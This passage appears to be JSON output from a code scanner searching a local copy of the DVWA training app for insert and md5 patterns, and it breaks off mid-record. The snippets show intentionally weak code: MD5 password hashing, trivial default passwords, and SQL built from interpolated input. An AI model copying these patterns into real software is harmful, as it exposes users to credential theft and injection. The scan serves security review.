"match": "<span class=\"line-number\">62:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'2'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Gordon'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Brown'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'gordonb'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'abc123'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}gordonb.jpg'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">63:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'3'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Hack'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Me'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'1337'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'charley'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}1337.jpg'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">64:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'4'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Pablo'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Picasso'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'pablo'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'letmein'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}pablo.jpg'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">65:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'5'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'bob'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'smith'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'smithy'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'password'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}smithy.jpg'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">66:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">pg_query</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">67:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'users' table<br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">pg_last_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">68:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">69:</span> }\n<span class=\"line-number\">70:</span> \n<span class=\"line-number\">71:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'users' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">72:</span> ",
"line": 67,
"start": 62,
"end": 73,
"severity": "unknown",
"note": ""
},
{
"id": 10,
"file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/PGSQL.php",
"filetype": "php",
"search": "\\sinsert",
"match": "<span class=\"line-number\">66:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">pg_query</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">67:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'users' table<br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">pg_last_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">68:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">69:</span> }\n<span class=\"line-number\">70:</span> \n<span class=\"highlight\"><span class=\"line-number\">71:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'users' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">72:</span> \n<span class=\"line-number\">73:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Create guestbook table\n<span class=\"line-number\">74:</span> \n<span class=\"line-number\">75:</span> <span class=\"token variable\">$drop_table</span> <span class=\"token operator\">=</span> \"DROP table <span class=\"token keyword\">IF</span> EXISTS guestbook<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">76:</span> ",
"line": 71,
"start": 66,
"end": 77,
"severity": "unknown",
"note": ""
},
{
"id": 11,
"file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/PGSQL.php",
"filetype": "php",
"search": "\\sinsert",
"match": "<span class=\"line-number\">86:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">87:</span> }\n<span class=\"line-number\">88:</span> \n<span class=\"line-number\">89:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"'guestbook' table was created.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">90:</span> \n<span class=\"highlight\"><span class=\"line-number\">91:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Insert data into <span class=\"token string\">'guestbook'</span></span>\n<span class=\"line-number\">92:</span> <span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"INSERT INTO guestbook (comment, name) VALUES('This is a test comment.','admin')\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">93:</span> \n<span class=\"line-number\">94:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">pg_query</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">95:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'guestbook' table<br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">pg_last_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">96:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 91,
"start": 86,
"end": 97,
"severity": "unknown",
"note": ""
},
{
"id": 12,
"file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/PGSQL.php",
"filetype": "php",
"search": "\\sinsert",
"match": "<span class=\"line-number\">90:</span> \n<span class=\"line-number\">91:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Insert data into <span class=\"token string\">'guestbook'</span>\n<span class=\"line-number\">92:</span> <span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"INSERT INTO guestbook (comment, name) VALUES('This is a test comment.','admin')\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">93:</span> \n<span class=\"line-number\">94:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">pg_query</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">95:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'guestbook' table<br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">pg_last_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">96:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">97:</span> }\n<span class=\"line-number\">98:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'guestbook' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">99:</span> \n<span class=\"line-number\">100:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Setup successful!\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 95,
"start": 90,
"end": 101,
"severity": "unknown",
"note": ""
},
{
"id": 13,
"file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/PGSQL.php",
"filetype": "php",
"search": "\\sinsert",
"match": "<span class=\"line-number\">93:</span> \n<span class=\"line-number\">94:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">pg_query</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">95:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'guestbook' table<br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">pg_last_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">96:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">97:</span> }\n<span class=\"highlight\"><span class=\"line-number\">98:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'guestbook' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">99:</span> \n<span class=\"line-number\">100:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Setup successful!\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">101:</span> <span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">102:</span> \n<span class=\"line-number\">103:</span> <span class=\"token function\">pg_close</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$dbconn</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 98,
"start": 93,
"end": 104,
"severity": "unknown",
"note": ""
},
{
"id": 234,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
"filetype": "php",
"search": "\\sinsert",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\"><</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\"><</span>table width<span class=\"token operator\">=</span><span class=\"token string\">'100%'</span> bgcolor<span class=\"token operator\">=</span><span class=\"token string\">'white'</span> style<span class=\"token operator\">=</span><span class=\"token string\">\"border:2px #C0C0C0 solid\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token operator\"><</span>tr<span class=\"token operator\">></span>\n<span class=\"line-number\">7:</span> \t<span class=\"token operator\"><</span>td<span class=\"token operator\">></span><span class=\"token operator\"><</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>About<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>A SQL injection attack consists of insertion <span class=\"token operator\">or</span> <span class=\"token string\">\"injection\"</span> of a SQL query via the input data from the client <span class=\"token keyword\">to</span> the application<span class=\"token punctuation\">.</span></span>\n<span class=\"line-number\">10:</span> \t\t\tA successful SQL injection exploit can read sensitive data from the database<span class=\"token punctuation\">,</span> modify database data <span class=\"token punctuation\">(</span>insert<span class=\"token operator\">/</span>update<span class=\"token operator\">/</span>delete<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> execute administration operations on the database\n<span class=\"line-number\">11:</span> \t\t\t<span class=\"token punctuation\">(</span>such as shutdown the DBMS<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> recover the content of a given file present on the DBMS file system <span class=\"token punctuation\">(</span>load_file<span class=\"token punctuation\">)</span> <span class=\"token operator\">and</span> <span class=\"token keyword\">in</span> some cases issue commands <span class=\"token keyword\">to</span> the operating system<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>SQL injection attacks are a type of injection attack<span class=\"token punctuation\">,</span> <span class=\"token keyword\">in</span> which SQL commands are injected into data<span class=\"token operator\">-</span>plane input <span class=\"token keyword\">in</span> order <span class=\"token keyword\">to</span> effect the execution of predefined SQL commands<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">14:</span> ",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 24,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">524:</span> \n<span class=\"line-number\">525:</span> function <span class=\"token function\">generateSessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> { # Generate a brand new <span class=\"token punctuation\">(</span>CSRF<span class=\"token punctuation\">)</span> token\n<span class=\"line-number\">526:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">527:</span> \t\t<span class=\"token function\">destroySessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">528:</span> \t}\n<span class=\"highlight\"><span class=\"line-number\">529:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">530:</span> }\n<span class=\"line-number\">531:</span> \n<span class=\"line-number\">532:</span> function <span class=\"token function\">destroySessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> { # Destroy any session <span class=\"token keyword\">with</span> the name <span class=\"token string\">'session_token'</span>\n<span class=\"line-number\">533:</span> \t<span class=\"token function\">unset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">534:</span> }",
"line": 529,
"start": 524,
"end": 535,
"severity": "unknown",
"note": ""
},
{
"id": 49,
"file": "/home/chris/src/DVWA-master/login.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">21:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>\"<span class=\"token keyword\">SELECT</span> table_schema<span class=\"token punctuation\">,</span> table_name<span class=\"token punctuation\">,</span> create_time\n<span class=\"line-number\">24:</span> \t\t\t\tFROM information_schema<span class=\"token punctuation\">.</span>tables\n<span class=\"line-number\">25:</span> \t\t\t\tWHERE table_schema<span class=\"token operator\">=</span><span class=\"token string\">'{$_DVWA['</span>db_database<span class=\"token string\">']}'</span> <span class=\"token operator\">AND</span> table_name<span class=\"token operator\">=</span><span class=\"token string\">'users'</span>\n<span class=\"line-number\">26:</span> \t\t\t\tLIMIT <span class=\"token number\">1</span>\"<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 21,
"start": 16,
"end": 27,
"severity": "unknown",
"note": ""
},
{
"id": 69,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> ",
"line": 16,
"start": 11,
"end": 22,
"severity": "unknown",
"note": ""
},
{
"id": 75,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token 